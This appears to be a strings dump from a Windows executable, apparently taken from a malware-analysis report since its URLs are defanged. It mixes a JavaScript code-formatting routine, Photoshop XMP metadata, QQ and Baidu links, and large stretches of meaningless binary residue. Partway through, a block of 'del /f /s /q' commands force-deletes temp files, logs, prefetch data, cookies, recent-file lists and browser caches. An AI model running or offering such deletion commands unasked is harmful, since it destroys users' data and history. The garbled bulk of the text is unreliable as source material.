(parser_pos >= input.length) {break;}}return [c, "TK_OPERATOR"];}return [c, "TK_UNKNOWN"];}
indent_character = indent_character || " ";indent_size = indent_size || 4;indent_string = "";while (indent_size--) {indent_string  = indent_character;}input = js_source_text;last_word = "";last_type = "TK_START_EXPR";last_text = "";output = [];do_block_just_closed = false;var_line = false;var_line_tainted = false;whitespace = "\n\r\t ".split("");wordchar = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$".split("");punct = "  - * / % &    -- =  = -= *= /= $= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |=".split(" ");line_starters = "continue,try,throw,return,var,if,switch,case,default,for,while,break,function".split(",");current_mode = "BLOCK";modes = [current_mode];indent_level = indent_level || 0;parser_pos = 0;in_case = false;while (true) {var t = get_next_token(parser_pos);token_text = t[0];token_type = t[1];if (token_type === "TK_EOF") {break;}switch (token_type) {case "TK_START_EXPR":var_line = false;set_mode("EXPRESSION");if (last_type === "TK_END_EXPR" || last_type === "TK_START_EXPR") {} else if (last_type !== "TK_WORD" && last_type !== "TK_OPERATOR") {print_space();} else if (in_array(last_word, line_starters) && last_word !== "function") {print_space();}print_token();break;case "TK_END_EXPR":print_token();restore_mode();break;case "TK_START_BLOCK":if (last_word === "do") {set_mode("DO_BLOCK");} else {set_mode("BLOCK");}if (last_type !== "TK_OPERATOR" && last_type !== "TK_START_EXPR") {if (last_type === "TK_START_BLOCK") {print_newline();} else {print_space();}}print_token();indent();break;case "TK_END_BLOCK":if (last_type === "TK_START_BLOCK") {trim_output();unindent();} else {unindent();print_newline();}print_token();restore_mode();break;case "TK_WORD":if (do_block_just_closed) {print_space();print_token();print_space();break;}if (token_text === "case" || token_text === "default") {if (last_text === ":") {remove_indent();} else {unindent();print_newline();indent();}print_token();in_case = true;break;}prefix = "NONE";if (last_type === "TK_END_BLOCK") {if (!in_array(token_text.toLowerCase(), ["else", "catch", "finally"])) {prefix = "NEWLINE";} else {prefix = "SPACE";print_space();}} else if (last_type === "TK_END_COMMAND" && (current_mode === "BLOCK" || current_mode === "DO_BLOCK")) {prefix = "NEWLINE";} else if (last_type === "TK_END_COMMAND" && current_mode === "EXPRESSION") {prefix = "SPACE";} else if (last_type === "TK_WORD") {prefix = "SPACE";} else if (last_type === "TK_START_BLOCK") {prefix = "NEWLINE";} else if (last_type === "TK_END_EXPR") {print_space();prefix = "NEWLINE";}if (last_type !== "TK_END_BLOCK" && in_array(token_text.toLowerCase(), ["else", "catch", "finally"])) {print_newline();} else if (in_array(token_text, line_starters) || prefix === "NEWLINE") {if (last_text === "else") {print_space();} else if ((last_type === "TK_START_EXPR" || last_text === "=") && token_text === "function") {} else if (last_type === "TK_WORD" && (last_text === "return" || last_text === "throw")) {print_space();} else if (last_type !== "TK_END_EXPR") {if ((last_type !== "TK_START_EXPR" || token_text !== "var") && last_text !== ":") {if (token_text === "if" && last_type === "TK_WORD" && last_word === "else") {print_space();} else {print_newline();}}} else {if (in_array(token_text, line_starters) && last_text !== ")") {print_newline();}}} else if (prefix === "SPACE") {print_space();}print_token();last_word = token_text;if (token_text === "var") {var_line = true;var_line_tainted = false;}break;case "TK_END_COMMAND":print_token();var_line = false;break;case "TK_STRING":if (last_type === "TK_START_BLOCK" || last_type === "TK_END_BLOCK") {print_newline();} else if (last_type === "TK_WORD") {print_space();}print_token();break;case "TK_OPERATOR":var start_delim = true;var end_delim = true;if (var_line && token_text !== ",") {var_line_tainted = true;if (token_text === ":") {var_line = false;}}if (token_text === ":" && in_case) {print_token();print_newline();break;}in_case = false;if (token_text === ",") {if (var_line) {if (var_line_tainted) {print_token();print_newline();var_line_tainted = false;} else {print_token();print_space();}} else if (last_type === "TK_END_BLOCK") {print_token();print_newline();} else {if (current_mode === "BLOCK") {print_token();print_newline();} else {print_token();print_space();}}break;} else if (token_text === "--" || token_text === "  ") {if (last_text === ";") {start_delim = true;end_delim = false;} else {start_delim = false;end_delim = false;}} else if (token_text === "!" && last_type === "TK_START_EXPR") {start_delim = false;end_delim = false;} else if (last_type === "TK_OPERATOR") {start_delim = false;end_delim = false;} else if (last_type === "TK_END_EXPR") {start_delim = true;end_delim = true;} else if (token_text === ".") {start_delim = false;end_delim = false;} else if (token_text === ":") {if (last_text.match(/^\d $/)) {start_delim = true;} else {start_delim = false;}}if (start_delim) {print_space();}print_token();if (end_delim) {print_space();}break;case "TK_BLOCK_COMMENT":print_newline();print_token();print_newline();break;case "TK_COMMENT":print_space();print_token();print_newline();break;case "TK_UNKNOWN":print_token();break;default:;}last_type = token_type;last_text = token_text;}return output.join("");}
x =a.replace(/^\s /, '')
1970/01/01 00:00:00
hXXp://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=RCktKi0lMSknJwQiKzwpJS0oaicrKQ
o..mR
2014:08:11 23:35:18
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2014-08-11T23:35:18 08:00" xmp:MetadataDate="2014-08-11T23:35:18 08:00" xmp:ModifyDate="2014-08-11T23:35:18 08:00" xmpMM:InstanceID="xmp.iid:88C211196D21E411AFECD0C188815805" xmpMM:DocumentID="xmp.did:87C211196D21E411AFECD0C188815805" xmpMM:OriginalDocumentID="xmp.did:87C211196D21E411AFECD0C188815805" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:87C211196D21E411AFECD0C188815805" stEvt:when="2014-08-11T23:35:18 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:88C211196D21E411AFECD0C188815805" stEvt:when="2014-08-11T23:35:18 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
fS.o%c
2014:08:11 23:35:09
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2014-08-11T23:35:09 08:00" xmp:MetadataDate="2014-08-11T23:35:09 08:00" xmp:ModifyDate="2014-08-11T23:35:09 08:00" xmpMM:InstanceID="xmp.iid:457F4C926A21E411AFECD0C188815805" xmpMM:DocumentID="xmp.did:447F4C926A21E411AFECD0C188815805" xmpMM:OriginalDocumentID="xmp.did:447F4C926A21E411AFECD0C188815805" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:447F4C926A21E411AFECD0C188815805" stEvt:when="2014-08-11T23:35:09 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:457F4C926A21E411AFECD0C188815805" stEvt:when="2014-08-11T23:35:09 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
IF..IY~[
tencent://Message/?Uin=541724&websiteName=q-zone.qq.com&Menu=yes
hXXp://VVV.iqshw.com/
hXXp://t.qq.com/MiniAumcc
hXXp://user.qzone.qq.com/541724/mainv
.ov_k
g)s.nS
.Fo9v
4N*5%F\
efZ#.YsDq
Zu%.nh
F4e.nX
3Webrr
k.Iv9}
z#.Wr
=W{%ds
5[}.ef
.IF&\
N<\#.Yr
[x.mn
Om.cRk
zy%7S2
%Xm#S
Un.St
.WQg[E
5.ICfx
4fE.ps
jLX.xb
2008:08:27 00:10:42
2008:08:07 15:34:52
V.Qn:
7>WM(%xr)4
Z.gen
vP8.dc
.comment {color:green}
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
6836188
hXXp://mh-rj540927289.ys168.com/
hXXp://rizhi.kjkl8.com/
"G.yo
__.SH
Z.LMi
le|%X
hXXp://VVV.flvcd.com/start.htm
VVV.2345.com/?kq995572537
|*.exe
dir c:\windows
c.uty
hXXp://app.baidu.com/app/enter?appid=219431H#
hXXp://app.baidu.com/app/enter?appid=117202H#
hXXp://app.baidu.com/app/enter?appid=116462H#
hXXp://app.baidu.com/app/enter?appid=126743H#
hXXp://app.baidu.com/app/enter?appid=229402H#
hXXp://app.baidu.com/app/enter?appid=217943
gb%.Ur
1.eI&D
|*.mp3
'Zk.HP.HP1>B444
555111333444555
'Zk666.HP!n
444555333444444
-GO-GO.HP1=B333555555555333444
555333555666666
666666666
555555444333555
444.HP
555333555
666666444
.HP777
555666666666
555555555
.HP444444333444555444444222444444444333333444444333222333444444444444444444555333444555333333>>>444444444333333444444444333444444333444333444444444333333444444343434455444444433444444444333333444545444343444444444444433444444445444444555555444444555555555555555555656565555554656555555555555666566555656656666555545666666666666666666766666666666667667666666777777777666777777777777766777777777666777788878777666778777777766777777788777667877777777777777878777777777878887778777776777777788686787888888777676788888888777888888888888787888788788777777888888888777888888777777777888888888777888888888777777888888888777777777877777777777777787676777887887777676777777777666777788777667766777777777666666777777666666666666666666666666666666555666666666555555555666666555555666666555555666555555555444555555444444555555555555444444555555444555555555444444444444444444333444444444444444444444333444333333333333333333333222333333444333222222333333333222333333333222333333333333222222333333222
.HP.HP-GO1>B555.HP
555555333555
*Q].HP
.HP555555
777666555
.HP666666
666555333555
.HP555666
777555666
666666666666
!av.HP
555222666
777666555333
777777888777
666777777
444888777888555
888888555888
.HP666777777666444777777777555666666777666444666777666555666777777777444777777777666666666BBB555444666777878555454766777777667898999888988888888888888888888788888888888888888888888888998999888988888889888888888888888888888888888888888888888988989988988888888888888888888888888888888888888888888888999999899899888998888888888888888888888888888888888888888898899888898898898888888888888888888888888888888888888888898999898898888888888888888888887888888888888888888888888898999998898888888888888888888888888888888888888888888888998999888888888889888888888888888888888888888888888888888889889888888888888888888888888888888888888888888888888888889999888888888988888888888888778888888888888888888888888898998998899888888888888888888888888888888888888888888888666888888888777777888888888555777888888777666888888888666777777888777666777777777555666777777666555777777777555555777777666555666777777555444777666666555555666666555333777777666444555666555555444666666666555444555666666333555555
666888888777777
666777777777888
666888666333777
^^^333888999___
;;;<<<;;;888
;;;:::666999
999666999;;;
888777888
<<<;;;777
888999777
___;;;888
^^^===<<<
;;;===<<<
777;;;<<<
:::;;;999
```:::;;;
___999:::666\\\
555666;;;
<<<===>>>999
<<<===888<<<
___777;;;:::___
___:::999777\\\
RRRRRRSSSHHH===999
"""!!!"""
!!!"""!!!
"""!!!"""
;;;SSSZZZ```aaa```_________[[[[[[YYYWWWXXXSSSSSSRRRSSSTTTMMMOOOPPPNNNIIIIIIKKKKKKGGGDDDIIIFFFJJJDDDFFFHHHFFFHHHDDDDDDEEEFFFBBBAAAGGGFFFGGGBBBCCCCCCDDD666SSSHHHFFFFFFAAACCCFFFCCCDDDAAACCCEEEGGGAAABBBFFF333
333TTTUUUJJJNNNSSSRRRQQQGGGPPPTTTTTTMMMHHHSSSQQQRRRHHHNNNQQQSSSOOOJJJSSSRRRSSSHHH
kkkXXXYYYWWWQQQUUUSSSRRRQQQNNNOOOSSSRRRHHHLLLMMMLLLKKKFFFMMMMMMKKKFFFIIIHHHKKKFFFDDDJJJJJJIIIDDDFFFIIIFFFHHHDDDDDDEEEHHHCCCCCCGGGFFFGGGBBBDDDFFFHHHFFFBBB888SSSHHHDDDFFFEEEIIIFFFDDDGGGGGGIIIDDDEEEIIIJJJHHH333
]]]\\\\\\[[[WWWVVVUUUVVVSSSSSSOOORRRSSSQQQQQQNNNNNNPPPLLLLLLKKKMMMNNNIIIHHHKKKJJJKKKFFFFFFKKKGGGHHHFFFGGGJJJGGGDDDEEEFFFHHHGGGDDDGGGFFFHHHEEEFFFGGGGGGGGGEEEFFFFFFHHHFFFDDD999SSSHHHGGGJJJHHHGGGGGGHHHGGGHHHHHHFFFHHHHHHKKKIII555
YYYXXXYYYTTTVVVUUUTTTUUUPPPRRRSSSPPPQQQOOOPPPPPPNNNMMMOOOMMMOOONNNJJJKKKMMMIIIJJJJJJKKKKKKGGGHHHIIIEEEFFFGGGGGGIIIHHHHHHHHHHHHGGGHHHFFFFFFGGGIIIHHHHHHEEEFFFGGGGGGGGGFFFHHH999SSSHHHGGGHHHGGGGGGIIIHHHIIIHHHIIIIIIIIIIIIGGGIIIIII>>>555333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333777DDDTTTWWWVVVVVVVVVVVVUUUVVVVVVVVVTTTUUUTTTVVVWWWWWWYYYTTTTTTYYYUUUVVVPPPUUUVVVTTTTTT
NNNNNNMMMMMMLLLLLLLLLMMMLLLJJJLLLLLLLLLLLLLLLLLLKKKLLLKKKLLLIIIKKKJJJJJJKKKIIIJJJJJJIIIIIIJJJGGGLLLMMMGGGGGGGGGKKKIIIIIIIIIIIIKKKHHHHHHIIIJJJLLLMMMIIIKKKJJJIIIKKKKKKJJJHHHHHH>>>SSSHHHJJJKKKKKKLLLJJJIIILLLKKKLLLIIIKKKKKKIIILLLJJJ
>>>>>>???CCCCCC<<<BBBBBBBBBBBB===BBBCCCDDD>>>@@@BBBCCCAAA;;;BBBBBBCCC???@@@CCCBBBCCC===CCCEEEEEECCCCCCFFFGGGGGG>>>EEEHHHFFFDDD???HHHFFFHHHDDDDDDGGGHHHGGG@@@FFFGGGHHHDDDEEEFFFGGGIIICCCJJJJJJKKKHHHEEEGGGJJJLLLBBBJJJKKKHHHFFFFFFJJJKKKJJJEEEJJJLLLNNNKKKKKKQQQMMMKKKEEEIIINNNMMMMMMFFFJJJOOORRRIIIJJJLLLKKKOOOFFFOOOOOOPPPJJJGGGLLLOOOPPPFFFJJJMMMKKKIIIGGGPPPOOOPPPDDDNNNPPPOOOMMMHHHMMMOOOMMMEEEJJJQQQQQQMMMDDDPPPNNNMMMJJJJJJOOONNNMMMGGGMMMNNNPPPLLLIIIPPPOOOQQQFFFLLLNNNPPPLLLFFFPPPPPPQQQGGGLLLNNNQQQGGGLLLPPPQQQPPPMMMKKKRRRRRROOOIIIOOOPPPPPPIIIOOOOOONNNSSSHHHQQQSSSOOOOOOJJJ
???:::BBBEEECCC:::>>>CCCCCCAAA:::DDDFFFBBB===@@@DDDBBBBBB;;;BBBGGGFFF>>>???FFFDDDCCC;;;AAAEEEFFF>>>???EEEGGGDDD>>>CCCGGGDDDCCC>>>GGGFFFGGG@@@CCCHHHLLLHHH???KKKHHHKKKDDDDDDJJJGGGGGG>>>JJJJJJLLLDDDFFFMMMMMMLLLBBBKKKJJJLLLHHHDDDLLLOOOKKKDDDGGGLLLLLLHHHDDDMMMMMMNNNHHHIIIPPPPPPLLLBBBKKKLLLNNNIIIGGGMMMNNNKKKEEEMMMOOOMMMHHHEEEPPPLLLMMMDDDOOOMMMNNNIIIFFFPPPPPPNNNFFFHHHPPPQQQMMMHHHOOOPPPNNNGGGHHHOOOPPPHHHCCCOOONNNOOOGGGHHHNNNQQQOOOEEELLLRRROOOJJJIIIOOOPPPOOOFFFKKKQQQRRRLLLGGGOOORRRPPPIIIKKKSSSRRRHHHKKKQQQRRRRRRJJJLLLRRRSSSPPPJJJLLLRRRRRRJJJMMMQQQUUUTTTHHHPPPTTTQQQOOOJJJQQQWWWSSSHHHOOOTTTVVVPPPJJJVVVVVVTTTMMMPPPUUUSSSQQQJJJRRRWWWUUUNNNPPPVVVUUUTTTHHHTTTVVVWWWOOOOOOXXXVVVVVVLLLSSSXXXWWWPPPLLLWWWVVVXXXLLLRRRZZZXXXSSSOOOYYYWWWZZZOOORRRZZZWWWTTTOOOXXXZZZWWWSSSSSSYYYWWWXXXOOOWWWZZZ\\\RRRRRR]]]XXX[[[OOOTTT[[[[[[VVVQQQ\\\[[[[[[QQQVVV___```YYYOOOYYY\\\\\\SSSUUU[[[]]]\\\OOO^^^aaa^^^VVVVVV]]]\\\[[[SSS]]]\\\```[[[SSS]]]aaa\\\QQQZZZ```bbb]]]SSS]]]``````WWWZZZaaa___```QQQ\\\```bbbZZZZZZcccaaa]]]SSSaaa]]]^^^XXXWWWcccaaa^^^UUU]]]dddbbbYYYSSScccbbb^^^SSS[[[bbbaaa]]]TTTbbbbbbbbbYYY^^^ddd```aaaWWWbbbdddbbbZZZ\\\aaabbb___UUUaaaccc```^^^ZZZaaa___]]]VVV]]]cccccc___WWWdddbbbaaa\\\___```bbb```XXXdddcccaaaZZZ\\\```ccc___TTT```ddd```ZZZ[[[ddddddaaaWWWaaaccc```^^^UUUbbb```bbbYYY^^^ccc___]]]UUU```dddaaaXXX\\\aaa```]]]VVVbbbdddaaaZZZYYYaaaddd___UUU___dddddd\\\YYYbbbaaa```XXX^^^dddaaa\\\YYY```cccaaaWWW
BBBFFFCCC888DDDCCCEEE======DDDFFFDDD;;;AAAGGGGGGBBB>>>DDDFFFBBB@@@AAAEEEGGGEEE<<<GGGGGGGGG>>>@@@IIIGGGCCC>>>JJJEEEGGG???BBBGGGHHHHHH:::HHHIIIIIIBBBBBBKKKHHHKKKAAAHHHIIILLLFFFBBBKKKLLLLLLCCCGGGHHHJJJHHH@@@NNNHHHJJJCCCGGGKKKKKKJJJ@@@JJJKKKLLLHHHEEELLLMMMMMM@@@IIIMMMKKKHHHHHHNNNOOOOOOCCCJJJKKKNNNKKKDDDPPPOOORRRDDDKKKNNNPPPKKKDDDNNNOOOOOOGGGHHHNNNNNNNNNBBBLLLOOOOOOGGGGGGOOOOOOOOOEEEMMMNNNRRRGGGHHHRRRQQQRRRDDDKKKPPPRRRKKKGGGQQQQQQPPPGGGIIIRRRQQQMMMDDDRRROOORRRIIIMMMPPPRRRRRRFFFNNNSSSSSSIIIKKKNNNUUUQQQFFFOOORRRTTTNNNIIIUUUSSSSSSHHHMMMWWWVVVQQQIIITTTUUUTTTLLLLLLRRRVVVQQQGGGWWWTTTUUUHHHNNNVVVVVVSSSGGGSSSUUUVVVPPPKKKWWWVVVXXXHHHSSSWWWXXXOOOKKKWWWXXXYYYNNNQQQVVVXXXPPPKKKXXXVVVXXXOOOOOOZZZWWWTTTKKKXXXYYYYYYPPPPPPXXXYYYZZZLLLXXXWWW]]]TTTOOO[[[\\\[[[NNNVVVYYYWWWTTTRRRZZZ[[[\\\RRRWWW]]]]]]ZZZPPP^^^\\\___VVVSSSZZZ]]]YYYOOOZZZ]]]]]]WWWVVV^^^^^^]]]QQQ\\\[[[\\\YYYRRRZZZ___^^^PPPZZZ]]]^^^^^^TTT___```^^^TTTWWW___```]]]PPP^^^^^^aaaWWWUUUaaa]]]\\\TTT^^^]]]```[[[WWWbbbbbbfffSSS[[[cccccc^^^VVVcccaaaaaaWWW\\\aaabbb```TTTaaa___cccWWWXXXcccbbb```TTTaaabbbddd\\\YYYbbbbbbaaaXXXbbbdddccc^^^XXXbbbeeecccXXX[[[aaa```^^^WWWcccfffcccZZZ^^^eeeeeeaaaWWWdddcccaaaZZZ[[[fffccc```SSSaaadddcccZZZ\\\aaaeeecccTTT]]]fffeee]]]XXXdddbbbgggZZZ]]]hhhaaaaaaWWWeeebbbbbb[[[]]]ccccccbbbTTTaaaeeeddd^^^XXXcccdddaaaUUUbbbaaabbb]]]YYYeeeaaacccVVVbbbeeeaaa```XXXdddbbbeeeYYY^^^cccccc___VVV___dddaaaVVVZZZbbbddd```SSSaaaaaa
777_^]   
000@@@000
666(((^^^
555666555
777777777
777777777777
777777777777777
888888888888
999999999888
hXXp://static.video.qq.com/TPout.swf?auto=1&vid=c10481aw5lh
hXXp://static.video.qq.com/TPout.swf?auto=1&vid=s1028r5xby9
M(.NzVle
.ww4#93GOr^Ps
q;.FT)
Sp.Ec
3<.Ap
MSGAm
2013:07:02 15:15:53
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2012-10-29T23:14:20 08:00" xmp:ModifyDate="2013-07-02T15:15:53 08:00" xmp:MetadataDate="2013-07-02T15:15:53 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:E3D53EFBE4E2E211B05C91EA7401C6C6" xmpMM:DocumentID="xmp.did:C667AB03DE21E211AF38C937235FDCFA" xmpMM:OriginalDocumentID="xmp.did:C667AB03DE21E211AF38C937235FDCFA"> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>adobe:docid:photoshop:04458224-f3e2-11e0-a089-b748c632ba2f</rdf:li> <rdf:li>uuid:E936A98AEA04E211A34592A99BC2C166</rdf:li> <rdf:li>xmp.did:2A3D3033821AE21199938FD7ED154739</rdf:li> <rdf:li>xmp.did:323D3033821AE21199938FD7ED154739</rdf:li> <rdf:li>xmp.did:75068B93821AE21199938FD7ED154739</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:C667AB03DE21E211AF38C937235FDCFA" stEvt:when="2012-10-29T23:14:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:C767AB03DE21E211AF38C937235FDCFA" stEvt:when="2012-10-29T23:52:15 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:E2D53EFBE4E2E211B05C91EA7401C6C6" stEvt:when="2013-07-02T15:15:53 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:E3D53EFBE4E2E211B05C91EA7401C6C6" stEvt:when="2013-07-02T15:15:53 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E2D53EFBE4E2E211B05C91EA7401C6C6" stRef:documentID="xmp.did:C667AB03DE21E211AF38C937235FDCFA" stRef:originalDocumentID="xmp.did:C667AB03DE21E211AF38C937235FDCFA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
hXXp://qqspace-av.qq.com/616838257/8012/8012.jpgr
(*.jpg,*.bmp)|*.jpg;*.bmp
|*.jpg
|*.wav
*.wav
: "(2)10"
: "((1)/(2))20"
: (4/3)*(3/4))
:   - * /
: () [] {}
2004:04:25 02:21:47
.askp1
HhXXp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x='adobe:ns:meta/' x:xaptk='XMP toolkit 2.8.2-33, framework 1.5'>
<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>
<rdf:Description about='uuid:0942f3af-961c-11d8-99b2-c7e24cea3f52'
xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>
<xapMM:DocumentID>adobe:docid:photoshop:0942f3ad-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
%U]U1
PP.EqC
@o%xnM
Tc%U8n4
o%USO
E-.at_
2004:02:08 16:36:07
:f×!
<rdf:Description about='uuid:af877a71-5a11-11d8-85f1-be8d25f2dac4'
<xapMM:DocumentID>adobe:docid:photoshop:af877a6f-5a11-11d8-85f1-be8d25f2dac4</xapMM:DocumentID>
<H:.mI
lX.nn j
.uNp5
x*Ny%C
%Drvnc
2004:04:25 02:19:57
<rdf:Description about='uuid:2332690e-961b-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:23326904-961b-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
o4}%c
~.Tq{
.riu]
}y).Mg
-GQ},
O'.th
NDe%X
.Foc[t
2004:04:25 02:24:37
<rdf:Description about='uuid:a4b56598-961c-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:66f63ec5-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
*^R%FRF
ml.ez
-|Tw&.GJG
q$.yI
,ml.wnO
2004:04:25 02:22:00
<rdf:Description about='uuid:0942f3b1-961c-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:0942f3ac-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
&%D'Er
qP.Ob%
.%.nCd
e%S)I
%x1IH
I%FRJ
.dzUD
2004:04:25 02:23:41
<rdf:Description about='uuid:66f63ec4-961c-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:66f63ec2-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
%ci'|xy
s.qmU
|Ö{
2.yk,
2004:04:25 01:57:01
<rdf:Description about='uuid:a40c81ff-9618-11d8-8f52-b8a44ba9a2fa'
<xapMM:DocumentID>adobe:docid:photoshop:a40c81fd-9618-11d8-8f52-b8a44ba9a2fa</xapMM:DocumentID>
h.qsK@
Lhm.ws
2004:04:25 02:22:53
.WhuL
<rdf:Description about='uuid:66f63ebc-961c-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:0942f3b3-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
.uNs^[
-5}?2
4i.~V%D
2004:04:25 02:23:03
=.Jy1J0>
<rdf:Description about='uuid:66f63ebe-961c-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:0942f3b2-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
G.GiFUUo
/e%FI
2004:02:07 00:09:42
<rdf:Description about='uuid:b91a4333-58be-11d8-9516-8193a0f63929'
<xapMM:DocumentID>adobe:docid:photoshop:b91a4331-58be-11d8-9516-8193a0f63929</xapMM:DocumentID>
<}.AOj
M%xQL
Hxv%D
t].nS
bw4O%F
V.Kosd
^.Sj|)
Y.QY!{
)%d\w
hAU;-F}:
2004:04:25 02:19:46
`n.Ev
<rdf:Description about='uuid:2332690c-961b-11d8-99b2-c7e24cea3f52'
<xapMM:DocumentID>adobe:docid:photoshop:a40c81fc-9618-11d8-8f52-b8a44ba9a2fa</xapMM:DocumentID>
?4%cT
.pkA.&
5.fC^Z
@hm.kv
4SF%F
2004:04:25 02:23:21
<rdf:Description about='uuid:66f63ec1-961c-11d8-99b2-c7e24cea3f52'
